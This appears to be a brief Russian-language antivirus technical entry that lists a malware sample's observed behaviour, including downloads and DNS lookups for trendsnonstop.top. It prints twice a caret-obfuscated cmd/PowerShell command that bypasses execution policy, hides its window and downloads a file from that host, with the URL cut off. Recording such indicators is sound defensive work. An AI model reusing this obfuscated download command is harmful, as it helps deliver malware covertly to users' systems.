Техническая информация
- http://trendsnonstop.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^OWER^S^HEL^L.Exe ^-eX^ecU^tionPO^li^CY^ By^P^a^s^s -No^Pr^OF^i^Le^ -wIn^D^ow^S^t^yLe H^iDDen (^NEW^-Ob^Ject ^SysteM.nEt.^WEBcL^IENt).DOwN^LoADfI^lE(^'http://trendsnonstop.to...
- DNS ASK tr####nonstop.top
- '<SYSTEM32>\cmd.exe' /c "P^OWER^S^HEL^L.Exe ^-eX^ecU^tionPO^li^CY^ By^P^a^s^s -No^Pr^OF^i^Le^ -wIn^D^ow^S^t^yLe H^iDDen (^NEW^-Ob^Ject ^SysteM.nEt.^WEBcL^IENt).DOwN^LoADfI^lE(^'http://trendsnonstop.to...' (со скрытым окном)